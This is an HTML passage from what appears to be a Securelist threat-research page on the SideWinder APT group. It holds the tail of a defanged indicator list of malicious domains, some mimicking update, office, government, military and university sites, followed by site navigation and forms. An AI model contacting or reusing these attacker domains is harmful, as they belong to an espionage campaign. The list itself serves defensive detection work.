href="https://opentip.kaspersky.com/pdfrdr-update.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8e8e2155acf5ee48&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pdfrdr-update[.]info</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bb2af66e07325644&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]com</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______537f2711a608a853&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]live</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c28b659e222984c9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]org</a><br /> <a href="https://opentip.kaspersky.com/ptcl-net.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4a8e1c1be39ed002&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ptcl-net[.]com</a><br /> <a href="https://opentip.kaspersky.com/scrabt.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8eefdb2911408f6d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">scrabt[.]tech</a><br /> <a href="https://opentip.kaspersky.com/shipping-policy.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______202c724c77f34476&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">shipping-policy[.]info</a><br /> <a href="https://opentip.kaspersky.com/sjfu-edu.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f8af1e982f63600b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">sjfu-edu[.]co</a><br /> <a href="https://opentip.kaspersky.com/support-update.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eeca9d7aed803727&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">support-update[.]info</a><br /> <a href="https://opentip.kaspersky.com/tazze.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eb05660d9c8716df&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">tazze[.]co</a><br /> <a href="https://opentip.kaspersky.com/tex-ideas.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dfddbe30bc0c0d10&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">tex-ideas[.]info</a><br /> <a href="https://opentip.kaspersky.com/tni-mil.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d5e5522cce0c336d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">tni-mil[.]com</a><br /> <a href="https://opentip.kaspersky.com/tsinghua-edu.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f78e1279781ff12&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">tsinghua-edu[.]tech</a><br /> <a href="https://opentip.kaspersky.com/tumet.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eb509cb0c95ae931&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">tumet[.]info</a><br /> <a href="https://opentip.kaspersky.com/u1x.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7620935e4c4790da&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">u1x[.]co</a><br /> <a href="https://opentip.kaspersky.com/ujsen.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fedac9908fb2891a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">ujsen[.]net</a><br /> <a href="https://opentip.kaspersky.com/update-govpk.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4224896f9fd0bebf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update-govpk[.]co</a><br /> <a href="https://opentip.kaspersky.com/updtesession.online/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0e4ae3bc1ff5ee6c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">updtesession[.]online</a><br /> <a href="https://opentip.kaspersky.com/widge.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f9dc7f2e189d4465&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">widge[.]info</a></p> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/backdoor/" class="c-link-tag"><span>Backdoor</span></a></li> <li><a href="https://securelist.com/tag/malware/" class="c-link-tag"><span>Malware</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/sidewinder/" class="c-link-tag"><span>SideWinder</span></a></li> <li><a href="https://securelist.com/tag/targeted-attacks/" class="c-link-tag"><span>Targeted attacks</span></a></li> <li><a href="https://securelist.com/tag/trojan/" class="c-link-tag"><span>Trojan</span></a></li> </ul> </div> <div class="c-article__authors u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' 
src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/vasilyberdnikov/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vasily Berdnikov</span></a> </li> </ul> </div> </div> <div id="comments" class="entry-comments c-article__comments js-comments-wrapper"> <p class="c-title--extra-small">Beyond the Surface: the evolution and expansion of the SideWinder APT group</p> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="u-hidden"> <small></small></h3><form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment --><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required" /></p> <p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required" /></p> <script type="text/javascript"> document.addEventListener("input", 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1024x576.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-768x432.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1536x864.jpg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-2048x1152.jpg 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-622x350.jpg 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-740x416.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-498x280.jpg 498w" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-trends-report-q1-2024/112473/" class="c-card__link">APT trends report Q1 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092337/NEXT_310x420_EN.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 
class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/13080938/SL-satellite-antennae-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/13080938/SL-satellite-antennae-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/research/" class="c-tag c-tag--primary">Research</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/" class="c-card__link">Threats in space (or rather, on Earth): internet-exposed GNSS receivers</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/isabelmanjarrez/" > <span>Isabel Manjarrez</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/11075744/ymir-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" 
data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/11075744/ymir-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/" class="c-card__link">Ymir: new stealthy ransomware in the wild</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/cristiansouza/" > <span>Cristian Souza</span></a> </li> <li> <a href="https://securelist.com/author/ashleymunoz/" > <span>Ashley Muñoz</span></a> </li> <li> <a href="https://securelist.com/author/eduardoovalle/" > <span>Eduardo Ovalle</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/cloudcomputating-qsc-framework/114438/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/07083007/cloud-computating-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/07083007/cloud-computating-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a 
href="https://securelist.com/cloudcomputating-qsc-framework/114438/" class="c-card__link">QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/saurabhsharma/" > <span>Saurabh Sharma</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/05093826/steelfox-featured-image-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/05093826/steelfox-featured-image-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/" class="c-card__link">New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/kirillkorchemny/" > <span>Kirill Korchemny</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal" 
data-element-id="latest-webinars-post-section"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Webinars</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/inside-the-dark-web-exploring-the-human-side-of-cybercriminals/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/10125625/cybercriminal-portrait-webinar-800x450.png" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/10125625/cybercriminal-portrait-webinar-800x450.png" data-srcset="" srcset="" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/threat-intelligence-and-incident-response/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Threat intelligence and IR</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-09-04T17:00:00+00:00" class="c-card__event-date"> 04 Sep 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/inside-the-dark-web-exploring-the-human-side-of-cybercriminals/" class="c-card__link" data-element-id="latest-webinars-post-title">Inside the Dark Web: exploring the human side of 
cybercriminals</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/annapavlovskaya/" data-element-id="latest-webinars-post-author"> <span>Anna Pavlovskaya</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/the-cybersecurity-buyers-dilemma-hype-vs-true-expertise/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144737/expertise-center-webinar-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/technologies-and-services/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" 
xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Technologies and services</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-08-13T17:00:00+00:00" class="c-card__event-date"> 13 Aug 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/the-cybersecurity-buyers-dilemma-hype-vs-true-expertise/" class="c-card__link" data-element-id="latest-webinars-post-title">The Cybersecurity Buyer&#8217;s Dilemma: Hype vs (True) Expertise</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/oleggorobets/" data-element-id="latest-webinars-post-author"> <span>Oleg Gorobets</span></a> </li> <li> <a href="https://securelist.com/author/alexanderliskin/" data-element-id="latest-webinars-post-author"> <span>Alexander Liskin</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/cybersecuritys-human-factor-more-than-an-unpatched-vulnerability/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-800x450.jpg 800w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27140525/human-factor-webinar-01-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-07-16T17:00:00+00:00" class="c-card__event-date"> 16 Jul 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/cybersecuritys-human-factor-more-than-an-unpatched-vulnerability/" class="c-card__link" data-element-id="latest-webinars-post-title">Cybersecurity&#8217;s human factor – more than an unpatched vulnerability</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/oleggorobets/" data-element-id="latest-webinars-post-author"> <span>Oleg Gorobets</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/building-and-prioritizing-detection-engineering-backlogs-with-mitre-attck/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" 
src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="(max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/07/09100900/sl-detection_backlog_prioritization-featured-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/trainings-and-workshops/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Trainings and workshops</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-07-09T16:00:00+00:00" class="c-card__event-date"> 09 Jul 2024, 4:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/building-and-prioritizing-detection-engineering-backlogs-with-mitre-attck/" class="c-card__link" data-element-id="latest-webinars-post-title">Building and prioritizing detection engineering backlogs with MITRE ATT&#038;CK</a></h3> </header> <footer 
class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/andreytamoykin/" data-element-id="latest-webinars-post-author"> <span>Andrey Tamoykin</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section data-element-id="footer-reports-section" class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Reports</h5> <div class="o-row o-row--small-gutters"> <div class="o-col-8@sm"> <div class="o-row o-row--small-gutters"> <div class="o-col-6@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/sidewinder-apt/114089/" class="c-card__link">Beyond the Surface: the evolution and expansion of the SideWinder APT group</a></h3> </header> <div class="c-card__desc"> <p>Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/blindeagle-apt/113414/" class="c-card__link">BlindEagle flying high in Latin America</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky shares insights into the activity and TTPs of the BlindEagle APT, which targets organizations and individuals in Colombia, Ecuador, Chile, Panama and other Latin American countries.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div 
class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/eastwind-apt-campaign/113345/" class="c-card__link">EastWind campaign: new CloudSorcerer attacks on government organizations in Russia</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky has identified a new EastWind campaign targeting Russian organizations and using CloudSorcerer as well as APT31 and APT27 tools.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/apt-trends-report-q2-2024/113275/" class="c-card__link">APT trends report Q2 2024</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>The report features the most significant developments relating to APT groups in Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called SalmonQT, and hacktivist activity.</p> </div> </div> </article> </div> </div> </div> <div class="o-col-4@sm u-hidden u-block@sm"> <div class="c-image c-image--overflow-down@sm"> <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/10091839/NEXT_370x500_EN.jpg" /></a> </div> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md" data-element-id="footer-subscribe-section"> <div class="o-container-fluid"> <div class="o-row c-block__row u-flex-nowrap@md"> <div class="o-col"> <div class="c-block__header"> <h5 class="c-block__title">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> </div> <div class="o-col u-flex-shrink-0 u-flex-grow"> <div 
class="c-form--newsletter u-ml-auto"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1624711611' ><div id='gf_1624711611' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1624711611' id='gform_1624711611' class='subscribe-mc' action='/sidewinder-apt/114089/#gf_1624711611' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1624711611' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1624711611_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1624711611_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1624711611_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1624711611_2'><div class='gchoice gchoice_11_2_1'> <input 
class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1624711611_11_2_1' /> <label for='choice_1624711611_11_2_1' id='label_1624711611_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button class="gform_button button" type="submit" id='gform_submit_button_1624711611' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span class="u-hidden u-inline@sm">Subscribe</span> <span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use></svg></span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' 